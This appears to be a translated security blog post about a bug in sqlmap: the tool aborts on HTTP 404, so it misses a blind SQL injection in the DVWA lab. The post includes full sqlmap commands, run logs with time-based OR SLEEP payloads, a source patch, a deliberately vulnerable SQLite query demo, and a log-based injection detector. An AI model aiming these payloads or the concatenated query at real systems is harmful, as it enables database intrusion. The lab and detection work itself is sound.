selenium status code 521_A bug in sqlmap's handling of HTTP 404 status codes
About
When sqlmap receives a 404 response for a page, it throws an exception and exits immediately, without running any of the remaining payload tests. When using sqlmap to test an injection point, the --batch option is commonly used to save time; in that situation sqlmap has a bug in its handling of HTTP status code 404 that prevents the injection point from being detected.
Detail
While crawling, the URLs of GET requests are easy to collect, but obtaining the URL and data of a POST request requires detecting form-related keywords in the HTML, constructing the POST parameter values from the form, and submitting them to obtain the subsequent response. Details in the following example:
Install DVWA and set level=low. When testing the SQL Injection (Blind) item, the parameter is submitted through a form: after clicking Submit, the content of the User ID input box is sent to the server as a GET request. For example, entering 1 in the text box makes the browser request http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#
Trying to find this injection point with sqlmap, the command is as follows:
sqlmap -u "http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie='PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low'
This works, but to discover the vulnerability automatically and efficiently with the tool, sqlmap is usually invoked like this:
sqlmap -u "http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/" --forms --batch -v 3 --cookie='...'
Here the value of the id parameter cannot be obtained by the crawler, because it is submitted through the form; the most the crawler can obtain is the URL:
http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#
The Submit button in the screenshot above corresponds to an action handled by JavaScript, which sends the form to the server as a GET request. In this case selenium+phantomjs is needed to obtain the URL above (or sqlmap's --forms option can be used to capture such forms). Even once the URL is obtained, it contains id=, i.e. the id value is empty. With --batch, sqlmap handles this by assigning a random value to id and testing the various payloads (e.g. id=1389). However, this DVWA page's server-side handling is unusual: if the id submitted by the user is not found, the server responds with a 404 status code (a typical WAF may well do the same), and when sqlmap sees a 404 it throws an exception and exits. As a result, this SQL injection point cannot be detected with sqlmap's --batch option.
In fact, once selenium+phantomjs has obtained the URL http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#, if the server responds to the query normally (this DVWA page does not: it uniformly returns a 404 status code when nothing is found), sqlmap can detect the injection point in this kind of URL whose parameter carries no concrete value, but --risk=3 has to be set. sqlmap's default risk value is 1, and at risk 1 sqlmap does not test ' or [sqli] and '1'='1 (an injection point in a parameter without a value has to be tested with OR). So to get the most out of sqlmap it is best to set --batch --risk=3 --forms. Let's try testing the injection point above directly with this method (the corresponding DVWA page is http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/):
/tmp/sqlmap [master] ? python2 sqlmap.py -u "192.168.8.190/dvwa/vulnerabilities/sqli_blind/" --forms -v 3 --cookie='PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low' --risk 3 --batch
___
__H__
___ ___[']_____ ___ ___ {1.1.8.6#dev}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:40:30
[14:40:30] [DEBUG] cleaning up configuration parameters
[14:40:30] [DEBUG] setting the HTTP timeout
[14:40:30] [DEBUG] setting the HTTP Cookie header
[14:40:30] [DEBUG] creating HTTP requests opener object
[14:40:30] [DEBUG] resolving hostname '192.168.8.190'
[14:40:30] [INFO] testing connection to the target URL
[14:40:30] [DEBUG] declared web page charset 'utf-8'
[14:40:30] [INFO] searching for forms
[14:40:30] [DEBUG] initializing the knowledge base
[#1] form:
GET http://192.168.8.190:80/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit
Cookie: PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low
do you want to test this form? [Y/n/q]
> Y
[14:40:30] [DEBUG] used the default behaviour, running in batch mode
Edit GET data [default: id=&Submit=Submit]: id=&Submit=Submit
[14:40:30] [DEBUG] used the default behaviour, running in batch mode
do you want to fill blank fields with random values? [Y/n] Y
[14:40:30] [DEBUG] used the default behaviour, running in batch mode
[14:40:30] [INFO] resuming back-end DBMS 'mysql'
[14:40:30] [INFO] using '/var/root/.sqlmap/output/results-08202017_0240pm.csv' as the CSV results file in multiple targets mode
[14:40:30] [DEBUG] resolving hostname '192.168.8.190'
[14:40:30] [DEBUG] declared web page charset 'utf-8'
[14:40:30] [CRITICAL] page not found (404)
[14:40:30] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[14:40:30] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/var/root/.sqlmap/output/results-08202017_0240pm.csv'
[*] shutting down at 14:40:30
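The two points made above (every value sqlmap sends to this page lands on a 404 until an OR-style probe changes the result set, and the very first 404 makes unpatched sqlmap exit) can be reproduced without DVWA. The following is an added example, not code from the post or from sqlmap: it models the page's "404 when no row matches" behaviour over an in-memory SQLite table with constructed rows, and uses a boolean OR probe instead of the post's time-based SLEEP payload because SQLite has no SLEEP. The vulnerable string-concatenated query is shown beside its parameterised form, so the same probes can be run against both.

```python
import sqlite3

# Constructed stand-in for the table behind DVWA's blind page (hypothetical rows, not DVWA's data).
SAMPLE_USERS = [(1, "admin"), (2, "gordonb"), (3, "1337")]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Query built by string concatenation, as on the security=low page: the id becomes SQL text."""
    sql = "SELECT first_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, user_id):
    """Same query with a bound parameter: the id is only ever data, never SQL."""
    sql = "SELECT first_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def status_for(rows):
    """Mimic the behaviour the post describes: 404 when no row matches, 200 otherwise."""
    return 200 if rows else 404


# The values sqlmap ends up sending, in order: the blank id from the crawled form, the random
# filler that --batch substitutes for it, a risk-1 style AND probe, and a risk-3 style OR probe.
PROBES = [
    ("blank", ""),
    ("random", "1389"),
    ("and", "' AND '1'='1"),
    ("or", "' OR '1'='1"),
]


def probe(lookup, conn):
    """Return the status code each probe value produces against the given lookup function."""
    results = {}
    for label, value in PROBES:
        try:
            results[label] = status_for(lookup(conn, value))
        except sqlite3.Error:
            results[label] = 500  # a broken query; treated like an error page
    return results


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(lookup_vulnerable, db))
    print("hardened:  ", probe(lookup_hardened, db))
```

Against the vulnerable lookup the blank id, the random filler and the AND probe all return 404, exactly like a harmless "no such user", and only the OR probe flips the page to 200; against the parameterised lookup every probe stays at 404. That is why an AND-only test at the default risk level cannot distinguish this page from a safe one, and why a scanner that treats the first 404 as fatal never gets as far as the probe that would.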
sqlmap fails to find it. Trying to modify the sqlmap code: the output contains the keyword page not found (404), so locate the relevant code:
cd /tmp/sqlmap && grep -r "page not found" .
The result is as follows:
./lib/request/connect.py: errMsg = "page not found (%d)" % code
./lib/request/connect.py: debugMsg = "page not found (%d)" % code
./lib/utils/crawler.py: if "page not found" in getSafeExString(ex):
So modify the following code in ./lib/request/connect.py:
            # Branch of the HTTP error handler in Connect.getPage() for a 404 response.
            elif ex.code == httplib.NOT_FOUND:
                if raise404:
                    # Treated as fatal: the exception propagates and sqlmap stops testing.
                    errMsg = "page not found (%d)" % code
                    raise SqlmapConnectionException(errMsg)
                else:
                    # Otherwise only logged once at debug level and the run continues.
                    debugMsg = "page not found (%d)" % code
                    singleTimeLogMessage(debugMsg, logging.DEBUG)
After commenting out raise SqlmapConnectionException(errMsg) and re-running the same sqlmap command, the injection point is detected. Details as follows:
/tmp/sqlmap [master●] ? python2 sqlmap.py -u "192.168.8.190/dvwa/vulnerabilities/sqli_blind/" --forms -v 3 --cookie='PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low' --risk 3 --batch
[14:48:41] [DEBUG] checking for filtered characters
[14:48:41] [PAYLOAD] OOFt' OR 6597=IF((3988>3987),SLEEP(5),6597) AND 'sIjt'='sIjt
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[14:49:06] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 146 HTTP(s) requests:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=OOFt' OR SLEEP(5) AND 'CaKs'='CaKs&Submit=Submit
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
do you want to exploit this SQL injection? [Y/n] Y
[14:49:06] [DEBUG] used the default behaviour, running in batch mode
[14:49:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[14:49:06] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 131 times
[14:49:06] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/var/root/.sqlmap/output/results-08202017_0246pm.csv'
[*] shutting down at 14:49:06
A pull request has been submitted to sqlmap; the relevant code file is lib/request/connect.py, follow
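From the server side, the run above is far from invisible: the second output shows 131 requests answered with 404 from one client against one path, most of them carrying SLEEP(...) or quoted OR/AND fragments in the query string. The following is an added example, not part of the post, showing how a defender could pick that pattern out of an Apache combined-format access log. The log lines are constructed for the example (the scanning host 192.168.8.50 and the ordinary user 192.168.8.77 are invented, the payloads are the ones printed in the post), and the User-Agent value follows sqlmap's default "sqlmap/<version> (http://sqlmap.org)" format, which is an assumption about this particular run.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache/nginx "combined" log format: client, ident, user, [timestamp], "request", status, size,
# "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Fragments that rarely occur in legitimate query strings but do in blind-injection probes.
SQLI_MARKERS = re.compile(r"(?i)(sleep\(|benchmark\(|'\s*(?:or|and)\s*'|union\s+select|\bif\()")

# Constructed sample log: five scanner requests (the first is --batch's random filler, the rest are
# probes from the post), then two requests from an ordinary user, one of which is also a 404.
SAMPLE_LOG = [
    '192.168.8.50 - - [20/Aug/2017:14:48:41 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=1389&Submit=Submit HTTP/1.1" 404 1275 "-" "sqlmap/1.1.8.6#dev (http://sqlmap.org)"',
    '192.168.8.50 - - [20/Aug/2017:14:48:41 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=1389%27%20AND%20%271%27%3D%271&Submit=Submit HTTP/1.1" 404 1275 "-" "sqlmap/1.1.8.6#dev (http://sqlmap.org)"',
    '192.168.8.50 - - [20/Aug/2017:14:48:42 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=OOFt%27%20OR%206597%3DIF((3988%3E3987)%2CSLEEP(5)%2C6597)%20AND%20%27sIjt%27%3D%27sIjt&Submit=Submit HTTP/1.1" 404 1275 "-" "sqlmap/1.1.8.6#dev (http://sqlmap.org)"',
    '192.168.8.50 - - [20/Aug/2017:14:48:48 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=OOFt%27%20OR%20SLEEP(5)%20AND%20%27CaKs%27%3D%27CaKs&Submit=Submit HTTP/1.1" 404 1275 "-" "sqlmap/1.1.8.6#dev (http://sqlmap.org)"',
    '192.168.8.50 - - [20/Aug/2017:14:48:54 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=OOFt%27%20OR%20SLEEP(5)%20AND%20%27CaKs%27%3D%27CaKs&Submit=Submit HTTP/1.1" 404 1275 "-" "sqlmap/1.1.8.6#dev (http://sqlmap.org)"',
    '192.168.8.77 - - [20/Aug/2017:14:50:02 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
    '192.168.8.77 - - [20/Aug/2017:14:50:10 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=9&Submit=Submit HTTP/1.1" 404 1275 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyse(lines, min_hits=3):
    """Group requests by (client, path) and flag groups that look like a blind-injection run."""
    stats = defaultdict(lambda: {"requests": 0, "not_found": 0, "sqli_like": 0, "sqlmap_ua": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["target"].split("?", 1)[0]
        entry = stats[(rec["ip"], path)]
        entry["requests"] += 1
        if rec["status"] == 404:
            entry["not_found"] += 1
        # Decode percent-encoding first so %27%20OR%20 is seen as "' OR ".
        if SQLI_MARKERS.search(unquote(rec["target"])):
            entry["sqli_like"] += 1
        if rec["ua"].lower().startswith("sqlmap"):
            entry["sqlmap_ua"] = True
    alerts = []
    for (ip, path), entry in sorted(stats.items()):
        if entry["sqli_like"] >= min_hits or entry["sqlmap_ua"]:
            alerts.append({"client": ip, "path": path, **entry})
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The User-Agent match is a convenience, not the signal to rely on, since the header is trivially changed; the durable indicators are the payload markers in the decoded query string and a single client accumulating 404s on one path, which is also why an application that answers "not found" with 404 gives its operators an easier log to read than one that returns 200 with an empty page.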
Summary